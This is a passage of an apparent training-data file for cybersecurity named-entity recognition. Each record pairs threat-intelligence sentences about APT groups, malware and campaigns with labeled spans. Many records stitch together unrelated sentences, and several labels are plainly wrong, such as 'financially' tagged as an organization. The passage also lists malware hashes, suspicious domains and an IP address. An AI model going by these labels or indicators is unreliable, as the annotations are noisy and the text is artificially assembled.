"ORGANIZATION: ESET": [[92, 96]]}, "info": {"id": "cyberner_stix_train_001917", "source": "cyberner_stix_train"}} {"text": "Palo Alto Networks customers are protected from the threat described in this blog through Threat Prevention signatures for the exploits and C2 traffic as well as through WildFire .", "spans": {"TOOL: Palo Alto Networks": [[0, 18]], "TOOL: C2": [[140, 142]], "TOOL: WildFire": [[170, 178]]}, "info": {"id": "cyberner_stix_train_001918", "source": "cyberner_stix_train"}} {"text": "Until mid-2015 , Rotexy used a plain-text JSON format to communicate with its C & C . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders .", "spans": {"MALWARE: Rotexy": [[17, 23]], "MALWARE: DeltaAlfa": [[100, 109]], "TOOL: DDoS bot": [[122, 130]], "MALWARE: RATANKBA": [[159, 167]], "MALWARE: Microsoft Office documents": [[242, 268]], "MALWARE: CHM files": [[281, 290]]}, "info": {"id": "cyberner_stix_train_001919", "source": "cyberner_stix_train"}} {"text": "The login originated from a computer on the same subnet , indicating that the attacker machine was physically close to the victim and on the same Wi-Fi network .", "spans": {"TOOL: Wi-Fi network": [[146, 159]]}, "info": {"id": "cyberner_stix_train_001920", "source": "cyberner_stix_train"}} {"text": "This implies that the authors are actively working to optimize EventBot over time . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . 
DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor .", "spans": {"MALWARE: EventBot": [[63, 71]], "MALWARE: Okrum": [[136, 141]], "MALWARE: DROPSHOT": [[336, 344]], "MALWARE: malware": [[367, 374]]}, "info": {"id": "cyberner_stix_train_001921", "source": "cyberner_stix_train"}} {"text": "The infection started from .NET malware , disguised as a WFC wallet updater ( a9e960948fdac81579d3b752e49aceda ) .", "spans": {"ORGANIZATION: WFC": [[57, 60]], "FILEPATH: a9e960948fdac81579d3b752e49aceda": [[78, 110]]}, "info": {"id": "cyberner_stix_train_001922", "source": "cyberner_stix_train"}} {"text": "File Detail : Info File name : job_titles_itworx.doc .", "spans": {"FILEPATH: job_titles_itworx.doc": [[31, 52]]}, "info": {"id": "cyberner_stix_train_001923", "source": "cyberner_stix_train"}} {"text": "The way in which each backdoor does so however is significantly different .", "spans": {}, "info": {"id": "cyberner_stix_train_001924", "source": "cyberner_stix_train"}} {"text": "It is possibly one of the most frequently asked questions on the Internet . this SWC was used to specifically target Turkish academic networks . Outlaw : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B . In one exchange on Aug. 
16 , 2012 , Ashley Madison ’s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": {"TOOL: SWC": [[81, 84]], "THREAT_ACTOR: Outlaw": [[145, 151]], "FILEPATH: 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976": [[154, 218]], "MALWARE: Trojan.Linux.SSHBRUTE.B": [[224, 247]], "ORGANIZATION: Ashley Madison ’s director of IT": [[286, 318]]}, "info": {"id": "cyberner_stix_train_001925", "source": "cyberner_stix_train"}} {"text": "0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 ( Defence&Security_2018_Conference_Agenda.docx ) ndpmedia24.com .", "spans": {"FILEPATH: 0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7": [[0, 64]], "FILEPATH: Defence&Security_2018_Conference_Agenda.docx": [[67, 111]], "DOMAIN: ndpmedia24.com": [[114, 128]]}, "info": {"id": "cyberner_stix_train_001926", "source": "cyberner_stix_train"}} {"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party .", "spans": {"THREAT_ACTOR: actors": [[11, 17]], "MALWARE: userinit.exe": [[134, 146]], "ORGANIZATION: government agencies": [[262, 281]], "ORGANIZATION: Fatah political party": [[290, 311]]}, "info": {"id": "cyberner_stix_train_001927", "source": "cyberner_stix_train"}} {"text": "First discussed in January 2013 in a Trend Micro whitepaper , FakeM is a Trojan that uses separate modules to perform its functionality . 
Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": {"ORGANIZATION: Trend Micro": [[37, 48]], "TOOL: FakeM": [[62, 67]], "TOOL: Trojan": [[73, 79]], "THREAT_ACTOR: Lazarus group": [[162, 175]], "TOOL: emails": [[225, 231]], "ORGANIZATION: job recruiters": [[246, 260]]}, "info": {"id": "cyberner_stix_train_001928", "source": "cyberner_stix_train"}} {"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "ORGANIZATION: financially": [[10, 21]], "ORGANIZATION: FireEye": [[156, 163]], "THREAT_ACTOR: admin@338": [[220, 229]], "TOOL: emails": [[276, 282]], "THREAT_ACTOR: attackers": [[289, 298]], "ORGANIZATION: government officials": [[308, 328]], "THREAT_ACTOR: cyber espionage": [[364, 379]]}, "info": {"id": "cyberner_stix_train_001929", "source": "cyberner_stix_train"}} {"text": "UPDATE_PATTERNS – reregister in the administration panel . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . 
Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts .", "spans": {"THREAT_ACTOR: OilRig": [[106, 112]], "ORGANIZATION: government": [[285, 295]], "MALWARE: N56.15.doc": [[298, 308]], "THREAT_ACTOR: Leafminer": [[418, 427]]}, "info": {"id": "cyberner_stix_train_001930", "source": "cyberner_stix_train"}} {"text": "In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems ( ICS ) at a critical infrastructure facility .", "spans": {"MALWARE: TRITON": [[40, 46]], "TOOL: industrial control systems": [[71, 97]], "TOOL: ICS": [[100, 103]]}, "info": {"id": "cyberner_stix_train_001931", "source": "cyberner_stix_train"}} {"text": "A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . Buhtrap is getting better at disguising the code they inject into compromised websites .", "spans": {"THREAT_ACTOR: Buhtrap": [[174, 181]], "MALWARE: compromised websites": [[240, 260]]}, "info": {"id": "cyberner_stix_train_001932", "source": "cyberner_stix_train"}} {"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": {"MALWARE: document": [[5, 13]], "MALWARE: sub-domains": [[173, 184]], "VULNERABILITY: exploit": [[192, 199]]}, "info": {"id": "cyberner_stix_train_001933", "source": "cyberner_stix_train"}} {"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . 
TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others .", "spans": {"VULNERABILITY: Rocke group exploits vulnerabilities": [[52, 88]], "MALWARE: TClient": [[151, 158]]}, "info": {"id": "cyberner_stix_train_001934", "source": "cyberner_stix_train"}} {"text": "The link leads to a phishing page that asks for banking login credentials or an account number and PIN . Lazarus used the open-source tool Invoke-PSImage , released December 20 , to embed the PowerShell script into the image file . The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives .", "spans": {"THREAT_ACTOR: Lazarus": [[105, 112]], "TOOL: Invoke-PSImage": [[139, 153]], "VULNERABILITY: zero-day exploits": [[258, 275]]}, "info": {"id": "cyberner_stix_train_001935", "source": "cyberner_stix_train"}} {"text": "In order to infect the victims , the attackers distributed spear-phishing emails containing malicious word document which dropped a malware capable of spying on infected systems .", "spans": {"TOOL: emails": [[74, 80]], "TOOL: malicious word": [[92, 106]]}, "info": {"id": "cyberner_stix_train_001936", "source": "cyberner_stix_train"}} {"text": "Ryuk was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks . Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"TOOL: Ryuk": [[0, 4]], "ORGANIZATION: Securelist": [[143, 153]], "VULNERABILITY: zero-day": [[183, 191]], "TOOL: Adobe Flash Player": [[192, 210]]}, "info": {"id": "cyberner_stix_train_001937", "source": "cyberner_stix_train"}} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . 
If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "ORGANIZATION: customers": [[126, 135]], "VULNERABILITY: CVE-2012-0158": [[202, 215]], "VULNERABILITY: CVE-2013-3906": [[218, 231]], "VULNERABILITY: CVE-2014-1761": [[235, 248]]}, "info": {"id": "cyberner_stix_train_001938", "source": "cyberner_stix_train"}} {"text": "Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 ( TG-1314 ) , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": {"ORGANIZATION: CTU": [[11, 14]], "THREAT_ACTOR: Threat Group-1314": [[68, 85]], "THREAT_ACTOR: TG-1314": [[88, 95]]}, "info": {"id": "cyberner_stix_train_001939", "source": "cyberner_stix_train"}} {"text": "In fact , we saw yet another Duke malware toolset , OnionDuke , appear first in 2013 .", "spans": {"THREAT_ACTOR: Duke": [[29, 33]], "MALWARE: OnionDuke": [[52, 61]]}, "info": {"id": "cyberner_stix_train_001940", "source": "cyberner_stix_train"}} {"text": "Their malware had not stayed undetected for those 4 and a half years .", "spans": {}, "info": {"id": "cyberner_stix_train_001941", "source": "cyberner_stix_train"}} {"text": "When inserted , this method runs every time any Activity object in any Android app is created . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) . In other words , while media organizations are important targets , it is possible that two separate groups are responsible for Hong Kong and Taiwan , respectively . 
Shortly thereafter , ESET ® researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": {"ORGANIZATION: ESET ® researchers": [[459, 477]], "MALWARE: new malware": [[503, 514]]}, "info": {"id": "cyberner_stix_train_001942", "source": "cyberner_stix_train"}} {"text": "cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs .", "spans": {"THREAT_ACTOR: cyber actors": [[0, 12]], "ORGANIZATION: media": [[47, 52]], "ORGANIZATION: aerospace": [[55, 64]], "ORGANIZATION: financial": [[67, 76]], "ORGANIZATION: critical infrastructure sectors": [[83, 114]], "ORGANIZATION: civil society": [[180, 193]]}, "info": {"id": "cyberner_stix_train_001943", "source": "cyberner_stix_train"}} {"text": "The Intent object carries a string value as “ action ” parameter . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past . The attachment SHIPPING_MX00034900_PL_INV_pdf.zip makes this message stand . 
An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: FireEye": [[81, 88]], "THREAT_ACTOR: Ke3chang": [[132, 140]], "THREAT_ACTOR: attackers": [[141, 150]], "ORGANIZATION: G20 meetings": [[225, 237]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[267, 301]]}, "info": {"id": "cyberner_stix_train_001944", "source": "cyberner_stix_train"}} {"text": "In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the LOC of operations of the South Sea Fleet of the PLA Navy .", "spans": {"VULNERABILITY: CVE-2012-0158": [[81, 94]], "THREAT_ACTOR: Anchor Panda": [[136, 148]], "ORGANIZATION: CrowdStrike": [[170, 181]]}, "info": {"id": "cyberner_stix_train_001945", "source": "cyberner_stix_train"}} {"text": "Based on infrastructure overlaps and leaked information , we assess with high confidence that the malware we identified and present in this paper is linked to Wolf Research . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS . The registry run key , in turn , points to the malware that has been dropped . 
In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"ORGANIZATION: Wolf Research": [[159, 172]], "MALWARE: SocGholish": [[386, 396]], "MALWARE: Domen toolkit": [[403, 416]], "MALWARE: sczriptzzbn": [[499, 510]], "MALWARE: SolarMarker": [[519, 530]], "MALWARE: NetSupport RAT": [[546, 560]]}, "info": {"id": "cyberner_stix_train_001946", "source": "cyberner_stix_train"}} {"text": "We also know Scarlet Mimic uses a number of toolkits to create documents that contain exploit code to install the FakeM payload on a compromised system . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[13, 26]], "TOOL: FakeM": [[114, 119]], "ORGANIZATION: consumer": [[231, 239]], "MALWARE: Carberp": [[331, 338]]}, "info": {"id": "cyberner_stix_train_001947", "source": "cyberner_stix_train"}} {"text": "However , the C2 can send an updated list . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 . The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv.xyz on TCP port 8080 . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"THREAT_ACTOR: MuddyWater": [[44, 54]], "THREAT_ACTOR: threat actor": [[82, 94]], "DOMAIN: cswksfwq.kfesv.xyz": [[202, 220]], "ORGANIZATION: Bradshaw": [[245, 253]], "ORGANIZATION: he and his then - girlfriend": [[283, 311]]}, "info": {"id": "cyberner_stix_train_001948", "source": "cyberner_stix_train"}} {"text": "Find out more about the 7 Android Security Hacks You Need to Do Right Now to keep your mobile data safe . 
The Carbanak attacks targeting over a 100 financial institutions worldwide . as the block number is changed in each maturity level . For more information , contact : intelreports@kaspersky.comPowerShell event logs for the creation of an arbitrary process from PowerShell .", "spans": {"SYSTEM: Android": [[26, 33]], "ORGANIZATION: financial institutions": [[148, 170]], "ORGANIZATION: intelreports@kaspersky.comPowerShell": [[272, 308]], "TOOL: PowerShell": [[366, 376]]}, "info": {"id": "cyberner_stix_train_001949", "source": "cyberner_stix_train"}} {"text": "This installs additional application from assets directory ( brother.apk ) and listens for PACKAGE_REMOVED events . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim .", "spans": {"SYSTEM: brother.apk": [[61, 72]], "VULNERABILITY: zero-day vulnerability": [[134, 156]], "VULNERABILITY: CVE-2015-2545": [[167, 180]], "THREAT_ACTOR: PLATINUM": [[191, 199]], "THREAT_ACTOR: Moafee": [[251, 257]], "THREAT_ACTOR: DragonOK": [[262, 270]], "TOOL: emails": [[292, 298]]}, "info": {"id": "cyberner_stix_train_001950", "source": "cyberner_stix_train"}} {"text": "XLoader also prevents victims from accessing the device ’ s settings or using a known antivirus ( AV ) app in the country . According to this new alert , Hidden Cobra the U.S government’s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . 
The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor : a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: Hidden Cobra": [[154, 166]], "ORGANIZATION: banks": [[305, 310]], "ORGANIZATION: CyberInt": [[378, 386]], "THREAT_ACTOR: TA505": [[462, 467]]}, "info": {"id": "cyberner_stix_train_001951", "source": "cyberner_stix_train"}} {"text": "The commands above are commonly executed when the operators first connect to a newly activated backdoor .", "spans": {}, "info": {"id": "cyberner_stix_train_001952", "source": "cyberner_stix_train"}} {"text": "The first attack occurred in early January of 2018 with an inbound WINDTAIL sample ( the backdoor family used by WINDSHIFT ) originating from the remote IP address 109.235.51.110 to a single internal IP address within the government agency . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": {"TOOL: WINDTAIL sample": [[67, 82]], "TOOL: WINDSHIFT": [[113, 122]], "ORGANIZATION: government agency": [[222, 239]], "MALWARE: Carbanak": [[242, 250]], "MALWARE: Carberp": [[293, 300]]}, "info": {"id": "cyberner_stix_train_001953", "source": "cyberner_stix_train"}} {"text": "The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine ( хакер ) .", "spans": {}, "info": {"id": "cyberner_stix_train_001954", "source": "cyberner_stix_train"}} {"text": "The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . 
This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: file": [[51, 55]], "MALWARE: C:\\WINDOWS\\tasksche.exe": [[56, 79]], "THREAT_ACTOR: Lazarus": [[126, 133]], "TOOL: emails": [[154, 160]], "ORGANIZATION: Bitcoin users": [[211, 224]], "ORGANIZATION: financial organizations": [[236, 259]]}, "info": {"id": "cyberner_stix_train_001955", "source": "cyberner_stix_train"}} {"text": "For example , the threat actors deleted volume shadow copies after using them for NTDS.dit retrieval .", "spans": {"FILEPATH: NTDS.dit": [[82, 90]]}, "info": {"id": "cyberner_stix_train_001957", "source": "cyberner_stix_train"}} {"text": "Phones ? This means that APT10 actors had two separate access points into the Visma network . In addition to the social engineering email technique , the attacker also employs a trick to the attachment .", "spans": {"THREAT_ACTOR: APT10": [[25, 30]], "TOOL: Visma network": [[78, 91]], "TOOL: email": [[132, 137]]}, "info": {"id": "cyberner_stix_train_001958", "source": "cyberner_stix_train"}} {"text": "After being publicly denounced by CSIS Group — a threat intelligence company in Denmark — Wolf Research was closed and a new organization named LokD was created . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways . Available data on the IXESHE campaign indicates that targeted emails with malicious .PDF file attachments were the attackers ’ vector of choice . 
Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"ORGANIZATION: CSIS Group": [[34, 44]], "ORGANIZATION: Wolf Research": [[90, 103]], "ORGANIZATION: LokD": [[144, 148]], "ORGANIZATION: Windows Defender ATP": [[163, 183]], "TOOL: LEAD": [[268, 272]], "TOOL: BARIUM": [[277, 283]], "THREAT_ACTOR: IXESHE": [[324, 330]], "TOOL: emails": [[364, 370]], "FILEPATH: .PDF": [[386, 390]], "SYSTEM: WordPress sites": [[513, 528]], "SYSTEM: WebDav server": [[562, 575]]}, "info": {"id": "cyberner_stix_train_001959", "source": "cyberner_stix_train"}} {"text": "Its main purpose is to download archives and execute the “ start ” binary from them . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks . Mandiant continues to track dozens of APT groups around the world ; however , this report is focused on the most prolific of these groups . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": {"TOOL: Android APKs": [[275, 287]], "ORGANIZATION: Mandiant": [[312, 320]], "ORGANIZATION: infected system": [[461, 476]], "SYSTEM: C2": [[489, 491]]}, "info": {"id": "cyberner_stix_train_001960", "source": "cyberner_stix_train"}} {"text": "In this latest incident , Transparent Tribe registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . 
We were soon able to help investigate another incident involving Lurk .", "spans": {"ORGANIZATION: government officials": [[171, 191]], "MALWARE: Lurk": [[275, 279]]}, "info": {"id": "cyberner_stix_train_001961", "source": "cyberner_stix_train"}} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[0, 14], [54, 68]], "ORGANIZATION: maritime-related": [[94, 110]], "ORGANIZATION: engineering firms": [[157, 174]], "ORGANIZATION: shipping": [[177, 185]], "ORGANIZATION: transportation": [[190, 204]], "ORGANIZATION: manufacturing": [[207, 220]], "ORGANIZATION: defense": [[223, 230]], "ORGANIZATION: government": [[233, 243]], "ORGANIZATION: research universities": [[258, 279]], "THREAT_ACTOR: APT33": [[312, 317]], "ORGANIZATION: organization": [[345, 357]], "ORGANIZATION: business conglomerate": [[377, 398]], "FILEPATH: malicious file": [[407, 421]], "ORGANIZATION: petrochemical company": [[494, 515]]}, "info": {"id": "cyberner_stix_train_001962", "source": "cyberner_stix_train"}} {"text": "Both sources can be found here and here . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . THREEBYTE : 16e627dbe730488b1c3d448bfc9096e2 . 
They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": {"MALWARE: THREEBYTE": [[197, 206]], "FILEPATH: 16e627dbe730488b1c3d448bfc9096e2": [[209, 241]], "TOOL: AdFind": [[259, 265]]}, "info": {"id": "cyberner_stix_train_001963", "source": "cyberner_stix_train"}} {"text": "The biggest number of Orangeworm 's victims are located in the U.S. , accounting for 17 percent of the infection rate by region . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"THREAT_ACTOR: cybercrime gang": [[147, 162]], "ORGANIZATION: banks": [[188, 193]], "ORGANIZATION: e-payment": [[196, 205]], "ORGANIZATION: financial institutions": [[218, 240]], "MALWARE: Carbanak": [[290, 298]], "MALWARE: Cobalt": [[303, 309]]}, "info": {"id": "cyberner_stix_train_001964", "source": "cyberner_stix_train"}} {"text": "We saw the message uploaded to the attackers ’ server within a second – see Figure 7 . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA .", "spans": {"THREAT_ACTOR: Turla": [[146, 151]], "TOOL: frameworks": [[207, 217]], "THREAT_ACTOR: HIDDEN COBRA": [[395, 407]]}, "info": {"id": "cyberner_stix_train_001965", "source": "cyberner_stix_train"}} {"text": "The malware may inject itself into browser processes and explorer.exe . 
However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"TOOL: malware": [[4, 11]], "MALWARE: explorer.exe": [[57, 69]], "TOOL: emails": [[96, 102]], "ORGANIZATION: bank employees": [[116, 130]]}, "info": {"id": "cyberner_stix_train_001966", "source": "cyberner_stix_train"}} {"text": "] 16 lala513.gicp [ . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same ACT .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "TOOL: ROCKBOOT": [[38, 46]], "THREAT_ACTOR: Dukes": [[109, 114], [310, 315]]}, "info": {"id": "cyberner_stix_train_001967", "source": "cyberner_stix_train"}} {"text": "Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks .", "spans": {"THREAT_ACTOR: Blackfly": [[0, 8]]}, "info": {"id": "cyberner_stix_train_001968", "source": "cyberner_stix_train"}} {"text": "The following day , TEMP.Veles again tried the utility on a compromised system .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[20, 30]]}, "info": {"id": "cyberner_stix_train_001969", "source": "cyberner_stix_train"}} {"text": "Based on analysis of the group's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": {"TOOL: SWCs": [[33, 37]], "THREAT_ACTOR: TG-3390": [[40, 47]]}, "info": {"id": "cyberner_stix_train_001970", "source": "cyberner_stix_train"}} {"text": "Change server request The URL 's for the new server is 
obfuscated , preventing easy network identification . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia . KHRAT : SHA256 : aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim ’s PC .", "spans": {"TOOL: fake resume application": [[172, 195]], "TOOL: letter": [[203, 209]], "MALWARE: KHRAT": [[268, 273]], "FILEPATH: aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380": [[285, 344]], "ORGANIZATION: GReAT": [[363, 368]], "MALWARE: MiniDuke": [[433, 441]], "VULNERABILITY: Java and Internet Explorer vulnerabilities": [[460, 502]]}, "info": {"id": "cyberner_stix_train_001971", "source": "cyberner_stix_train"}} {"text": "By releasing ReelPhish , we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor .", "spans": {"ORGANIZATION: Mandiant": [[31, 39]], "TOOL: emails": [[186, 192]], "FILEPATH: Hancitor": [[311, 319]]}, "info": {"id": "cyberner_stix_train_001973", "source": "cyberner_stix_train"}} {"text": "To be installed , it needs the victim to allow installation of apps from unknown sources in the device settings . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . 
Based on the compilation dates of the binaries , the campaign took place in the same period .", "spans": {"ORGANIZATION: FireEye": [[118, 125]], "ORGANIZATION: iSIGHT": [[126, 132]], "ORGANIZATION: Mandiant": [[229, 237]], "THREAT_ACTOR: APT32": [[256, 261]]}, "info": {"id": "cyberner_stix_train_001974", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP continuously monitors protected systems for such indicators of hostile activity and alerts security operations center ( SOC ) personnel to their presence .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]], "TOOL: security operations center": [[112, 138]], "TOOL: SOC": [[141, 144]]}, "info": {"id": "cyberner_stix_train_001975", "source": "cyberner_stix_train"}} {"text": "SHA256 : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f .", "spans": {"FILEPATH: 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f": [[9, 73]]}, "info": {"id": "cyberner_stix_train_001976", "source": "cyberner_stix_train"}} {"text": "Detecting threat actors who are \" living off the land , \" using credentials , systems , and tools they collect along the way instead of backdoors , can be challenging for organizations that focus their instrumentation and controls primarily on the detection of malware and indicators such as command and control IP addresses , domains , and protocols .", "spans": {}, "info": {"id": "cyberner_stix_train_001977", "source": "cyberner_stix_train"}} {"text": "To get around this challenge , TrickMo ’ s developers added some new features to steal TANs using screen video recording and screen data scraping . The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . 
POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"MALWARE: TrickMo": [[31, 38]], "TOOL: HawkEye malware": [[152, 167]], "MALWARE: POWRUNER": [[314, 322]], "MALWARE: malicious RTF": [[345, 358]], "VULNERABILITY: CVE-2017-0199": [[379, 392]]}, "info": {"id": "cyberner_stix_train_001978", "source": "cyberner_stix_train"}} {"text": "Instead of being controlled by a traditional command-and-control server , it receives instructions via tweets . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other way . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 .", "spans": {"THREAT_ACTOR: they": [[185, 189]], "THREAT_ACTOR: Lazarus Group": [[254, 267]], "ORGANIZATION: Novetta": [[292, 299]]}, "info": {"id": "cyberner_stix_train_001979", "source": "cyberner_stix_train"}} {"text": "sms_send : to send C2-specified SMS messages to C2-specified recipients . While the malware deployed is not terribly sophisticated , it uses techniques such as DNS command and control ( C2 ) that allows it to stay under the radar at many establishments . The dropper , along with the Python RAT E-TOOL , attempts to gather information on the victim 's machine and then uses multiple cloud services : Google Drive , Twitter , ImgBB and Google Forms . 
